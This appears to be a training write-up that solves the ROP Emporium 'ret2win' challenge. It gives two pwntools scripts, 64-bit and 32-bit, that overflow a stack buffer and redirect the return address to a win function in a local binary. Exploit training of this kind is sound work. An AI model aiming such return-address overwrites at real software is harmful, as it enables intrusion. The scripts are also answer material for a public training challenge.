# checksec
# exploit code & exploit
1. 64bit
#!/usr/bin/python
from pwn import *
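# Local solve for the 64-bit ROP Emporium "ret2win" training binary: pad up to
# the saved return address and overwrite it with the address of ret2win().
p = process("./ret2win")
elf = ELF("./ret2win")

# NOTE(review): the symbol address is used as-is, with no load base applied,
# so this assumes a non-PIE binary. Confirm against the checksec output, which
# this page does not reproduce.
ret2win = elf.symbols['ret2win']

# 0x28 bytes of filler reach the saved return address (offset as given by the
# author; presumably the buffer plus the 8-byte saved rbp - TODO confirm in a
# debugger). The overwrite only takes effect if no stack canary sits in between.
# Bytes literals are required: p64() returns bytes, and str + bytes raises
# TypeError on Python 3. On Python 2, b'A' is the same as 'A'.
pay = b'A' * 0x28 + p64(ret2win)

# Wait for the prompt, then send the payload followed by a newline.
p.sendlineafter(b"> ", pay)
p.interactive()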
2. 32bit
#!/usr/bin/python
from pwn import *
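# Local solve for the 32-bit ROP Emporium "ret2win32" training binary: same
# idea as the 64-bit variant, with a 4-byte saved frame pointer and p32().
p = process("./ret2win32")
elf = ELF("./ret2win32")

# NOTE(review): the static symbol address is used directly, which assumes a
# non-PIE binary. Confirm against the checksec output, which this page does
# not reproduce.
ret2win = elf.symbols['ret2win']

# 0x28 + 0x4 bytes of filler reach the saved return address (offset as given
# by the author; presumably the buffer distance plus the 4-byte saved ebp -
# TODO confirm in a debugger).
# Bytes literals are required: p32() returns bytes, and str + bytes raises
# TypeError on Python 3. On Python 2, b'A' is the same as 'A'.
pay = b'A' * (0x28 + 0x4) + p32(ret2win)

# Wait for the prompt, then send the payload followed by a newline.
p.sendlineafter(b"> ", pay)
p.interactive()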